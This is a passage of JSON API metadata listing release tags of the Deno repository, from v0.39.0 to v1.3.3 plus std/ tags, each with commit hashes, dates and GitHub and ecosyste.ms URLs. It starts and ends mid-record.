9.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a